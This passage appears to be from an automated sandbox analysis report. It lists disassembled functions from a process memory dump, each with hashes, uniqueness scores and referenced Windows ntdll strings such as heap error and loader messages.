                                                • Opcode ID: e65db58169a63081b00b4af00853a8c02156e70d3f19de91b44b12b5a71709fb
                                                • Instruction ID: 7a7b95b614ef77d5bcd1cc0df2825af301ae51fe2fbf4f8a2edd9ae0d3d447ba
                                                • Opcode Fuzzy Hash: e65db58169a63081b00b4af00853a8c02156e70d3f19de91b44b12b5a71709fb
                                                • Instruction Fuzzy Hash: CB911471A002069BEF18DF5DD880ABB7BB5FF54B18B5540AED905AB654EB30EE01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • HEAP: , xrefs: 0142A0BA
                                                • HEAP[%wZ]: , xrefs: 0142A0AD
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0142A0CD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: 09805b016fd136831ce8f99598f7ae9d3875eec213314230becdbd39ed5697c5
                                                • Instruction ID: b5a76055f6869f36defb6eef5b6c1707534b54ea01f075990b8913905951852e
                                                • Opcode Fuzzy Hash: 09805b016fd136831ce8f99598f7ae9d3875eec213314230becdbd39ed5697c5
                                                • Instruction Fuzzy Hash: E381E471204794EFE726CB6CC898BAABBF8FF04718F1441A5E541877A2D779E980CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                • Opcode ID: 329b358325c242b0756c8fb3ed44c94f4b3d89f572d21cb1848d886b475219cf
                                                • Instruction ID: f6f440d585d0592774362254137be56067f78d852fcad6e5b026b1cb428d48f3
                                                • Opcode Fuzzy Hash: 329b358325c242b0756c8fb3ed44c94f4b3d89f572d21cb1848d886b475219cf
                                                • Instruction Fuzzy Hash: D561FF716002419FDB29CF28D481B6AFFE5FF06308F5A856EE8498B759D770E881CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • LdrpCompleteMapModule, xrefs: 01419898
                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01419891
                                                • minkernel\ntdll\ldrmap.c, xrefs: 014198A2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                • API String ID: 0-1676968949
                                                • Opcode ID: b93009c498754632d97769579c537e994e28dbfbd7f32cbcc75e5bc44925ef1a
                                                • Instruction ID: 4394b2bc879654a90ed77f0303dc027bf2b5a3f86bcb7d36cfdcda7eed15a3f3
                                                • Opcode Fuzzy Hash: b93009c498754632d97769579c537e994e28dbfbd7f32cbcc75e5bc44925ef1a
                                                • Instruction Fuzzy Hash: B751E1326007469BEB21CB6DC994B6ABBE4AB01B1CF0405AEED559B7E5D730ED00CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0146256F
                                                • HEAP: , xrefs: 0146255C
                                                • HEAP[%wZ]: , xrefs: 0146254F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                • API String ID: 0-3815128232
                                                • Opcode ID: fafc52967e074c5dff5cbc923ec9fab715811cd0729385ae75577492b76cc7bb
                                                • Instruction ID: 81ff2bcf1427b4a41e1eff7126306888f583be9b8f5ead65373c942e42b8a1c3
                                                • Opcode Fuzzy Hash: fafc52967e074c5dff5cbc923ec9fab715811cd0729385ae75577492b76cc7bb
                                                • Instruction Fuzzy Hash: B5514934100260AAE374CE1EC844F727BF9DB4424CF45486BE9C28B7A5D6B5D843DB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • InstallLanguageFallback, xrefs: 013BE6DB
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 013BE68C
                                                • @, xrefs: 013BE6C0
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1757540487
                                                • Opcode ID: 6da4d3ee3941bc005e5cb15b24824fd8b72ab753118cc87652b84f37c607b484
                                                • Instruction ID: db7f74533f85c20d8d1841ec132daa9e2d321ae620ba578efbc208f08351d66a
                                                • Opcode Fuzzy Hash: 6da4d3ee3941bc005e5cb15b24824fd8b72ab753118cc87652b84f37c607b484
                                                • Instruction Fuzzy Hash: F25192766043469BD710DF68C480BEBB7E8AF89618F05093EFA85DB654F734D904C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 014242BA
                                                • HEAP: , xrefs: 014242AF
                                                • HEAP[%wZ]: , xrefs: 014242A2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                • API String ID: 0-1596344177
                                                • Opcode ID: 8dd8a3d36d34d7ae784c7dfab7f2631c3e1959352a7aec987ad7041b62741624
                                                • Instruction ID: b39aecab1a3dfc83086ebafd7182b7b51d5539af46cdb33c3b891eabeacc4928
                                                • Opcode Fuzzy Hash: 8dd8a3d36d34d7ae784c7dfab7f2631c3e1959352a7aec987ad7041b62741624
                                                • Instruction Fuzzy Hash: FC510072A00529EFCB14DF59D484B6ABBB5FF85308F1981A9D8059F742D731AC42CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: a0ae6245d591902d183e5344d188321ddbe3d5bba689d032384dda4e337efc3e
                                                • Instruction ID: fbaf97df51dc09400636c3a2087754fc4615b15c914423a3aaa81828712145af
                                                • Opcode Fuzzy Hash: a0ae6245d591902d183e5344d188321ddbe3d5bba689d032384dda4e337efc3e
                                                • Instruction Fuzzy Hash: 7A115B323041428FEB29D71AE485F3AFBA9EF4162CF16802EE046CB359EB70D884C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                • Instruction ID: 5ab8628fb2abde6e5640905e3be9b09cfd28b8c34b046078bcc215de3c5235db
                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                • Instruction Fuzzy Hash: 7A91B5312043429FE724CF29C941B9BBBE5BF84714F148A6EF699DB2A0E774E904CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: c0c0bae463edd0d29ba880bac9d87835457d183f6c2807469db23accb1a09155
                                                • Instruction ID: f615562d947df6a3af8a274295a276c133b14dd5ebc5f3137c36fefcb1a378f6
                                                • Opcode Fuzzy Hash: c0c0bae463edd0d29ba880bac9d87835457d183f6c2807469db23accb1a09155
                                                • Instruction Fuzzy Hash: 185150B1E046099FDB15DFA9C980BAEBBF8FF98704F14402EE649EF261D6719901CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: _vswprintf_s
                                                • String ID:
                                                • API String ID: 677850445-0
                                                • Opcode ID: 787e0d56ed16b23371c695fbc2bfc0cd251735817de2ed2f6629c68aa5b520f0
                                                • Instruction ID: 17ff6546efe9bfbe16c771642fe6382f7c59e76e4eedc5e1adbb50f2d9bf4342
                                                • Opcode Fuzzy Hash: 787e0d56ed16b23371c695fbc2bfc0cd251735817de2ed2f6629c68aa5b520f0
                                                • Instruction Fuzzy Hash: 5951F275D1025A8EEB31CF78C844BAEBBB1BF00714F1841AEDD59AB3AAD7704945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013DB9A5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 885266447-0
                                                • Opcode ID: 0b73fdbd18619775f6e33046d04300474abe7c810cc2942e28f431bb91bc30d3
                                                • Instruction ID: 020ec11bc2abb57044610d5dc6ee21f278a8707edb2b9c5fc794e1fafe5190cd
                                                • Opcode Fuzzy Hash: 0b73fdbd18619775f6e33046d04300474abe7c810cc2942e28f431bb91bc30d3
                                                • Instruction Fuzzy Hash: 48515872A08341CFD720CF2DD08092AFBE9FB89648F56496EF68587359D770E844CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                • API String ID: 0-1036084923
                                                • Opcode ID: ceb6ae60a30a3bcc0254c290dfda585b0261919509ab269b2274c876631ba3b8
                                                • Instruction ID: b21eabfcbc5a51ea6039b2fdc0064159e14be0e71c4be94fe4ec97aa5c4ef530
                                                • Opcode Fuzzy Hash: ceb6ae60a30a3bcc0254c290dfda585b0261919509ab269b2274c876631ba3b8
                                                • Instruction Fuzzy Hash: 01C1B271D00329DBDB24DF99D885BAEBBF8FF48758F45402AE901AB390D774A941CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0142BE0F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                • API String ID: 0-865735534
                                                • Opcode ID: 0bc2cb4fc1ec5b4312e85ee4f76e82cb37164b84b94af98cfaafd7a546dd0e81
                                                • Instruction ID: 399158ec6d775b013aa407f5eb4e77136940acd6f0016470e5ff87d436e0b485
                                                • Opcode Fuzzy Hash: 0bc2cb4fc1ec5b4312e85ee4f76e82cb37164b84b94af98cfaafd7a546dd0e81
                                                • Instruction Fuzzy Hash: B6A10471B007268BEB25DB6CC458BBAB7E8EF44728F14456EDA06CB7D1DB70D8418B80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Re-Waiting
                                                • API String ID: 0-316354757
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: WindowsExcludedProcs
                                                • API String ID: 0-3583428290
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Critical error detected %lx, xrefs: 01468E21
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Critical error detected %lx
                                                • API String ID: 0-802127002
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0144FF60
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                • API String ID: 0-1911121157
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                • Instruction ID: 5b79f0a87954d21a6921b12b36a36d06227fcbc4ea2ab50d9d61c29e183737d0
                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                • Instruction Fuzzy Hash: BA510030A0425A9FEB25CB6CC0C07AEBFB6AF05B1CF2881ADC55593782C375AD88C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                • Instruction ID: 18a309237d46c2526dc5ae5646d71835806558d338a5435704fef8bb8480da4b
                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                • Instruction Fuzzy Hash: 0351A071600646EFDB16DF18C490A56BBB5FF45305F24C0BAE9089F222E371EA46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c4fe1198771b4303b9f238aac32623da9f4ee1c9fe252dce655a33336e35156
                                                • Instruction ID: 2e47fed6830572cf9c1c16c94d2149714a59d1e6ba2110cf37505906660844dd
                                                • Opcode Fuzzy Hash: 8c4fe1198771b4303b9f238aac32623da9f4ee1c9fe252dce655a33336e35156
                                                • Instruction Fuzzy Hash: FB517C7190022ADFEF25DF59C844ADFBBB9BF48358F048119E904AB2A0D7318D92CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12be9d1b33d6c0bb37db651c17f3c9195d001bde8f159d41ffcd9ac016a70d1d
                                                • Instruction ID: 2a9215da25b72798e8b76ba21d4d2459e8166f9d343a634bb4b8471a96631680
                                                • Opcode Fuzzy Hash: 12be9d1b33d6c0bb37db651c17f3c9195d001bde8f159d41ffcd9ac016a70d1d
                                                • Instruction Fuzzy Hash: 4041B731A00229ABDF21DF68D944BEA77F8EF49714F4104AAE908EB351D774DE85CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 320811d5479ec107947fa17f81b0f215514b0f83f10396629c8bf3cd1207f402
                                                • Instruction ID: d5f89c9e4865d6fd0f0d5bb9728426ce38ed559a9714c4f889dc22f5e946aa41
                                                • Opcode Fuzzy Hash: 320811d5479ec107947fa17f81b0f215514b0f83f10396629c8bf3cd1207f402
                                                • Instruction Fuzzy Hash: 9841C171A403289EEB32DF18CC84B67B7E9EB58618F01009AE909D7781D770ED84CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f635229b03d736c765f72688eae0c0e2546c4c183433ad4c2ab578daf43fd10
                                                • Instruction ID: 4a982d31c0d4c4054586291c7b1d92e8451ec9b9d9bfcbee4ef4365021fa4228
                                                • Opcode Fuzzy Hash: 0f635229b03d736c765f72688eae0c0e2546c4c183433ad4c2ab578daf43fd10
                                                • Instruction Fuzzy Hash: 554152B5A0022D9BDB24DF5DCC88AAAB7F8EB54708F1045EED91997252E7709E80CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                • Instruction ID: 8dd1c2dccf21b6fcfdf1e50d73daf0b80d599cccf62e9693a2840e742921eafc
                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                • Instruction Fuzzy Hash: 4731D332B002056BEB15DB69C845BFFFBAAEF94210F29446AEA05A73A1DA749D01C750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                • Instruction ID: 26a861bbb8458fbabbb55bb37f456697d93c1f728f1ddfadbdf5f0caa1332bd2
                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                • Instruction Fuzzy Hash: B23148323006416FD3229B7CC854FABBBA9EBD5A50F18485BEA568B362DA70DC45C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                • Instruction ID: b7fc5806193621c1c60181b3a07675097511d9d9f20b065a7a89e4ea4a253667
                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                • Instruction Fuzzy Hash: 5B31E4326047069BC719DF28CC80AABB7AAFFD4214F044A6EF55697751DE30E809CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e53d44de035893ca834384232107750da249e4a69857c660669079a85ef18f2
                                                • Instruction ID: dbdba3616a0c7f6f084d3f2f968ab7ec0a441a211f67622cf86a75105178c4ac
                                                • Opcode Fuzzy Hash: 5e53d44de035893ca834384232107750da249e4a69857c660669079a85ef18f2
                                                • Instruction Fuzzy Hash: E7413EB1D0020AAFDB14DFA9D940BFEBBF4EF89718F15812EE914A7250DB749906CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf9def65a1c78b5bc6d2edeb1ee2cb2387be4e8f7b8230ee25cbe2536019f695
                                                • Instruction ID: 11aab851dc40825185c37b549543ba87b4b64093126bf1fe4bd08ad0beff8705
                                                • Opcode Fuzzy Hash: bf9def65a1c78b5bc6d2edeb1ee2cb2387be4e8f7b8230ee25cbe2536019f695
                                                • Instruction Fuzzy Hash: 2931F831241605DBD7229B1CC981B7A7779FF20768F91462BF6154BAA4E770EC42C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e23be4ba32f3dc3b467c2f900f5fc77b7102e2526a828b586821e3b8c477f422
                                                • Instruction ID: 6b341f7cf660037ff25db771dbe9ace06a4e37ab077c27298b0c2e141ce7dcf2
                                                • Opcode Fuzzy Hash: e23be4ba32f3dc3b467c2f900f5fc77b7102e2526a828b586821e3b8c477f422
                                                • Instruction Fuzzy Hash: 0C31D032601625DBD7258F2DC441A7BBBE4FF95718B05806EEA49DB7A0E730D880C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: adeaa3507f4d73b88cc4f357a0e11d4e47e1d1a134a7bd18b00278ee693ef4bd
                                                • Instruction ID: bd37d1788244ac3928c6edb406afa13ffd2426d3d97cc238aa96116d061e9930
                                                • Opcode Fuzzy Hash: adeaa3507f4d73b88cc4f357a0e11d4e47e1d1a134a7bd18b00278ee693ef4bd
                                                • Instruction Fuzzy Hash: DD418CB5A00325DFCB15CF98C490B99BBF1BB89318F1980AAE905AF395C774A941CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                • Instruction ID: 76beec9089cc29ae901e2903f47c780e3dd938079c96eb29cf69e18f5fba43ef
                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                • Instruction Fuzzy Hash: 2031287360155BBEDB05EBB8D480BEAFB59BF52208F04415ED51C47301DB386A4AC7E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa5efff0d0ed5902c7da70da9c129c1276294b24ab77916baada15065974cb96
                                                • Instruction ID: 068804a004036819a9f76b9e5e2e468be433fae66fb1031bfac77ef39be47430
                                                • Opcode Fuzzy Hash: fa5efff0d0ed5902c7da70da9c129c1276294b24ab77916baada15065974cb96
                                                • Instruction Fuzzy Hash: 4531A2B26047519BD721DF2CC840A6BB7A5BFC8600F054A2EF995977A0E730E904CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfd31e861c6f8015830438b65a3186049b661703b41262da8f8a1f122dffe964
                                                • Instruction ID: 152cee12ed440e461614ec7f77fb76e2991ce87e2fe1d5609f3ccab08de57bb8
                                                • Opcode Fuzzy Hash: dfd31e861c6f8015830438b65a3186049b661703b41262da8f8a1f122dffe964
                                                • Instruction Fuzzy Hash: C141F574A047558BDB219BB884047AFBAE2AF21308F54052EC08AAB391DB355949CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afdd29e5e89009374b6d2b9e8a2270b4fb4304b7f079d0451099b42c2b7f4a9b
                                                • Instruction ID: 32cf07736ce7b3dc5c027d2d50965a46070fdb9a6062cacc83ac7175bf3f224c
                                                • Opcode Fuzzy Hash: afdd29e5e89009374b6d2b9e8a2270b4fb4304b7f079d0451099b42c2b7f4a9b
                                                • Instruction Fuzzy Hash: CA319971A09342DFC710DF18D98081ABFE9FF95618F45496EE4889B761D730ED05CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c863425d863754a8ac4a4609820d06741d66fba4ebc2a7adb1367776306f529e
                                                • Instruction ID: 78b762eb6e897f49a399b2d2b366a1935d5300805041d74e81a453107e2cf0fb
                                                • Opcode Fuzzy Hash: c863425d863754a8ac4a4609820d06741d66fba4ebc2a7adb1367776306f529e
                                                • Instruction Fuzzy Hash: 263120F22412159FC330CF08D880F65BFF9FB94349F92095AE201873A8D3729901CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 683f522c922339be4affa192009e52d27b90a6f7a53bc465d96c23d7cb5f61e4
                                                • Instruction ID: a6ec99356f77767c89956ef1bfed642d24a130faf650055495d9f84ad0b6edce
                                                • Opcode Fuzzy Hash: 683f522c922339be4affa192009e52d27b90a6f7a53bc465d96c23d7cb5f61e4
                                                • Instruction Fuzzy Hash: F831A0B16057218FE360CF0DC845B26BBE8FFA8B14F44496EE998973A1E770D844CB91
                                                Uniqueness

